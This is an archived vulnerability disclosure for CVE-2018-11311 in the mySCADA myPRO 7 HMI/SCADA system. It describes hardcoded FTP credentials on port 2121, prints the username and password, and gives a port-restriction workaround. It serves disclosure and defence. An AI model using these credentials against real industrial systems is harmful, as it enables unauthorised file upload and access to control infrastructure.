关联漏洞
标题:mySCADA myPRO 安全漏洞 (CVE-2018-11311)Description:mySCADA myPRO是捷克共和国mySCADA Technologies公司的一套工业可视化控制系统。 mySCADA myPRO 7版本中的‘myscadagate.exe’文件存在安全漏洞,该漏洞源于程序使用了硬编码的FTP账户(用户名:myscada、密码:Vikuk63)。远程攻击者可借助该FTP账户利用该漏洞访问2121端口上的FTP服务器,上传文件或列出目录。
Description
CVE-2018-11311 | mySCADA myPRO 7 Hardcoded FTP Username and Password Vulnerability
介绍
# mySCADA myPRO 7 Hardcoded Credentials
# CVE-2018-11311
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11311
https://www.exploit-db.com/exploits/44656/
http://myscada.org/wp-content/uploads/downloads/BOXv7/changelog.txt
```
Changelog v7.0.46
-----------------
- fix of possible vulnerability as described here https://vuldb.com/?id.118038
- This release disables download of project using FTP protocol. The download is performed over secure SSL channel now.
- You don't have to do anything to activate this, it is done automatically. After the installation restart your system TWICE please.
- minor bug fixes - speed optimisation
```
# I. Background
myPRO is a professional HMI/SCADA system designed primarily for the visualisation and control of industrial processes. myPRO is effective and innovative solution for any industry that needs to be under non-stop operation. myPRO guarantees reliable supervision, a userfriendly interface and superior security.
It supports Windows OS (32/64-bit), Mac OS X and Linux (32/64-bit) platforms.
(more: https://www.myscada.org/mypro/)
# II. Problem Description
In the latest version of myPRO (v7), it has been discovered that the ftp server's -running on port 2121- username and password information is kept in the file by using reverse engineering. Anyone who connects to an FTP server with an authorized account can upload or download files onto the server running myPRO software.
# III. Technical
Firstly, I found that what ports myPRO listened to. You can get information used by the netstat command about the ports and the services running on it. As you can see from the pictures, when you install myPRO, you can see many ports open. The vulnerability works on all supported platforms.
## (username:password) = (myscada:Vikuk63)
In my first research on the Windows OS, myPRO has many process and I noticed that ‘myscadagate.exe’ is listening to port #2121. The 2121 port is important because it could be an ftp service.
As you can see from the picture below, I found that they put the username and password (myscada:Vikuk63) in the source code. I obtained access by connecting to port 2121 of myPRO's server with any FTP client.
# IV. Solution
As a workaround you need to restrict port 2121 access from the outside. There is no permanent solution for the vendor because there is no patch available.
文件快照
[4.0K] /data/pocs/f3ffb38b2cd8c5ee0fff150088dedb651592774e
├── [2.9K] README.md
└── [ 16] username-password.txt
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →